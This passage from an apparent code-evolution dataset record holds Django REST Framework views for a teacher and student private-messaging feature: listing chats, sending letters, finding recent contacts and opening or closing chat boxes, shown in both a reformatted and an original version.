'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverTea_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass enterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderTea_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverTea_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderTea_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & 
Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverTea_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass getRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n 
return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n 
receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': 
str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n 
receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, 
request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = 
JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-5": "from django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\nfrom ex.models import Teacher,Student,Group,Report,TeamEvaluation,PrivateLetter,ChatBoxIsOpen\nfrom django.core import serializers\n\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.hashers import make_password, check_password\n# from plane.models import User, Student, LightList, Light, Score, Visit\n# from plane.utils.jwt_auth import create_token, get_user_id\n# from django.contrib.auth.hashers import make_password, check_password\n\n# from rest_framework.authtoken.models import Token\n# from django.contrib.auth import authenticate\n\nimport os\n\nfrom ex.utils.jwt_auth import create_token, get_user_id\n\nfrom ex.utils.extensions.auth import JwtQueryParamAuthentication\n\nfrom django.db.models import Q\n\n# Create your views here.\n\nclass getPrivateLetterListsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n \n user_id = payload['id']\n \n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverTea_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': 
str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n # print(len(msgList1))\n else:\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverTea_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0,len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2+=1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1+=1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1+=1\n else:\n msgList.append(msgList2[i2])\n i2+=1\n\n # print(msgList)\n data = {\n 'id': item.id,\n 'receiver': receiver,\n 'msgList': msgList,\n 'name': receiver + str(identity),\n 'identity': identity\n }\n data_list.append(data)\n # print(data_list)\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass enterPrivateLetterView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n\n if identity == 0:\n privateLetter = 
PrivateLetter(senderTea_id=user_id,receiverTea_id=receiver,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverTea_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n privateLetter = PrivateLetter(senderTea_id=user_id,receiverStu_id=receiverStu_id,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverTea_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '发布私信成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 获取最近联系人\nclass getRecentContactsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n \n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != \"\":\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n # print(((receiver + str(identity)) not in dict))\n # if (receiver + str(identity)) not in dict:\n # dict[receiver + str(identity)] = '1'\n data = {\n # 'id': item.id,\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != \"\":\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = 
Student.objects.filter(id=item.senderStu_id).first().stu_num\n # print(((receiver + str(identity)) not in dict))\n # if (receiver + str(identity)) not in dict:\n # dict[receiver + str(identity)] = '1'\n data = {\n # 'id': item.id,\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1,-1,-1):\n if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'\n data_list1.append(data_list[i])\n\n # lenData = len(data_list1)\n # if lenData > 10:\n # data_list1 = data_list1[lenData - 10:lenData]\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list1\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 关闭聊天框\nclass closeChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n \n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 打开聊天框\nclass openChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': 
e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n \n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 搜索联系人\nclass searchContactView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n # print(receiver,identity=='0')\n\n # user = Teacher.objects.filter(id=username).first()\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {\n 'identity': iden,\n 'receiver': receiver\n }\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass stuGetPrivateLetterListsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = 
JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n username = payload['username']\n # print(user_id,username)\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverStu_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n # print(len(msgList1))\n else:\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0,len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2+=1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1+=1\n elif 
msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1+=1\n else:\n msgList.append(msgList2[i2])\n i2+=1\n\n # print(msgList)\n data = {\n 'id': item.id,\n 'receiver': receiver,\n 'msgList': msgList,\n 'name': receiver + str(identity),\n 'identity': identity\n }\n data_list.append(data)\n # print(data_list)\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass stuEnterPrivateLetterView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n username = payload['username']\n # print(user_id,username)\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,receiverTea_id=receiver,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,receiverStu_id=receiverStu_id,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '发布私信成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 获取最近联系人\nclass stuRecentContactsView(APIView):\n def 
get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n \n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != \"\":\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n data = {\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != \"\":\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id).first().stu_num\n data = {\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1,-1,-1):\n if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'\n data_list1.append(data_list[i])\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list1\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 关闭聊天框\nclass 